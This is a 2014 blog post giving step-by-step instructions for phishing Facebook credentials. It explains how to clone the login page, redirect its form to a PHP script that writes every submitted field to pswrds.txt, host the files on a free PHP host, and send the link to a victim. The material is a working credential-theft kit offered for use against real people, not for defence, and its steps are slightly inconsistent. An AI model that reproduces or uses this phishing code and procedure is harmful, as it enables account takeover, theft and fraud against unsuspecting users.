Wednesday 9 July 2014

How To Hack Facebook Using Phishing Attack

Right click on the white space of the front page. Select "View Page source".
Copy the code to Notepad.



STEP 2: Now find (Press ctrl +f) for "action=" in that code.
You fill find the code like this:



You have to change two things in that code..first of all you have to change method from POST to Get...as You can see in picture.
and secondly you have to change ACTION from https://login.facebook.com/login.php"
to "next.php"

Save the document as index.html
and Change the file type as All Files.

">Now we need to create the "next.php" to store the password. so open the notepad and type the following code:
STEP 3:
Now we need to create the "next.php" to store the password. so open the notepad and type the following code:
<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

save this file as "next.php"


Step 4:open the notepad and Now create a blank file and named it as "pswrds.txt".
Now onwards You have three files..first is "index.html".Second is "next.php" and third is "pswrds.txt"
Now we have to upload this three files on a php web hosting service.
many sites offers this kind of hosting services.but maximum of them are now stopped these services cause of use of them in hacking.others are still running but they are Providing paid services only.
I found 000webhost.com On internet.
000webhost.com , is an industry leader in providing top class free web hosting services without advertising! There are no hidden costs, no adverts, and no restrictive terms.
So now lets come to topic again...

STEP 5: Go to on http://www.000webhost.com/ 
and click on sign up. and select any domain name as i mentioned in image



STEP 6:After doing above steps you have to verify your mail account that you used at the time of signup process.Verify your mail account by clicking the link as you can see in picture.



STEP 7:Click on the site link which is shown under DOMAIN section to go to your control panel alternativly You can go to
http://members.000webhost.com/
for fake page uploading.



STEP 8: Now when you are logged into your account click on the Go to Cpanel in front of your domain that you had registered, and then Go to File Manager under Files and log into it.


STEP 9: After logging to Your File manager Section. Now Click on the Public_html directory.


 STEP 10: Before proceeding to next delete default.php under public_html directry.Now click on the Upload button, choose the three file that we created earlier.(index.html,next.php and pswrds.txt).

STEP 11: Now any one who visits your site would be taken to the Fake Facebook Login Page. After they enter their Username and Password, the username and password would be go to "passwrds.txt" file.



STEP 12: To Find Your Phishing Site Link or Url Please Refer To below Image.
How to hack facebook using phishing Attack How to hack facebook using phishing Attack How to hack facebook 

STEP 13: Now Everything is set. The Only thing that we have to do is that pass the link to victim.after that if he/she login through that link then we are able to get his/her account and password.

No comments:

Post a Comment